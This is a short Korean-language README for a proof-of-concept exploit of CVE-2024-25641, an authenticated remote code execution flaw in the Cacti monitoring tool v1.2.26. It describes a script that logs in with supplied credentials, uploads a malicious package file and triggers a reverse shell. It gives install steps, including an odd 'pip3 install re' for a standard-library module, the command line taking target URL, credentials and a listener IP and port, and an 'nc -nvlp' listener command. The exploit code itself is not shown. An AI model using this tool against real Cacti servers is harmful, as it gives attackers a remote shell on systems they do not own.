
Cacti v1.2.26에서의 CVE-2024-25641 인증 RCE에 대한 PoC
이 스크립트는 웹 기반 모니터링 도구인 Cacti의 CVE-2024-25641 취약점을 악용하기 위한 개념 증명(PoC)입니다. 이 스크립트는 애플리케이션에 인증하고, 악성 패키지를 업로드하며, 리버스 셸을 트리거하는 과정을 자동화합니다.
requests 라이브러리argparse 라이브러리re 라이브러리다음과 같이 pip3를 사용하여 필요한 Python 라이브러리를 설치할 수 있습니다:
pip3 install requests
pip3 install argparse
pip3 install re
(test.xml.gz) 파일을 exploit.py와 같은 디렉토리에 두십시오.
python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]
nc -nvlp <port>